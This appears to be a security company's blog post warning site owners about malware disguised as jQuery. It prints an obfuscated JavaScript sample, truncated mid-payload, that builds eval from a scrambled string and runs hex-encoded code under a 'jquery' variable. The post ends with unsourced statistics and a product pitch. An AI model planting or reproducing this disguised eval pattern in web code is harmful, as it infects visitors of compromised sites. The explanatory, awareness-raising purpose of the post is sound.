• Malware Posing as jQuery

    Web-based malware is the new bane of the Internet. Malware developers have focused on using websites to distribute millions of copies of viruses, Trojans and other malicious computer programs. This modern modus operandi banks on the fact that a website’s security is weak and can be easily compromised. In this article we want to raise awareness about how malware developers are hiding their malicious code to prevent detection by website administrators and other software.

    The Phenomenon
    The number of websites getting hacked is a trend strengthening by the day. More than 6,600 new websites get hacked every single day and consequently become distributors of malware and are subsequently blacklisted. This results in lost business and customer trust, not to mention that these compromised websites can become part of the chain of information theft.

    Attack patterns change hourly. Consider for example, that on any given day 200,000 samples of web-based malware are identified in websites on the Internet. Firewalls, Web Application Firewalls (WAFs) and other security software make it harder for hackers to penetrate website security, but given the sheer volume and variants of malware, it is impossible for these security vendors to deliver signatures in real-time.

    Malware Posing as jQuery
    One way hackers fly under the radar, while causing immense damage to visitors of compromised websites, is to make their malicious computer code look like trusted computer code developed by a reputed organization. We present an example below.

    var jquery = eval('wjign&dxogwj.;e&v&a;l;'.replace(/[g&;jx]/g, ''));
    jquery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x75\x56\x47\x34\x28\x66\x4d\x36\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x74\x44\x36\x42\x48\x28\x62\x62\x52\x35\x78\x29\x7b\x76\x61\x72\x20\x67\x33\x67\x39\x3d\x30\x3b\x76\x61\x72\x20\x66\x47\x50\x59\x44\x41\x53\x3d\x62\x62\x52\x35\x78\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x69\x4e\x49\x4a\x6b\x76\x6b\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x69\x4e\x49\x4a\x6b\x76\x6b\x3c\x66\x47\x50\x59\x44\x41\x53\x29\x7b\x67\x33\x67\x39\x2b\x3d\x70\x4b\x76\x35\x32\x28\x62\x62\x52\x35\x78\x2c\x69\x4e\x49\x4a\x6b\x76\x6b\x29\x2a\x66\x47\x50\x59\x44\x41\x53\x3b\x69\x4e\x49\x4a\x6b\x76\x6b\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x28\x67\x33\x67\x39\x2b\x27\x27\x29\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x70\x4b\x76\x35\x32\x28\x67\x51\x52\x2c\x7a\x72\x77\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x67\x51\x52\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x7a\x72\x77\x29\x3b\x7d\x20\x20\x20\x74\x72\x79\x20\x7b\x76\x61\x72\x20\x73\x44\x30\x76\x6c\x78\x3d\x65\x76

    This particular code was mined from a page on:

    http://www.acc4arab.com/newsite/[scrubbed].shtml

    This is just one of many examples of malware we see on a daily basis pretending to be a legitimate piece of software. In this case, the code is using a simple naming convention where the entire payload of the malware is assigned to a innocuous sounding variable whose name matches the name of a well known JavaScript framework used widely by developers: jQuery. In the past, we have seen hackers targeting jQuery, but in a slightly different manner. An interesting related post: Down the rabbit hole.

    Protect Your Website
    Website owners should take advantage of new emerging, website Health Monitoring solutions. This kind of new technology can scan websites without interruptions, is completely SaaS based and uses advanced Artificial Intelligence mechanisms to catch never-before-seen malware. This is a significant break from the way most traditional anti-virus software works. Simply scanning for signatures is not enough to detect the thousands of new malware variants. Consider for example that current anti-virus engines cannot detect web-based malware effectively.

    Use of new scanning technology such as on-demand web scanning can help website owners protect their reputation and maintain business continuity.

    Till next time…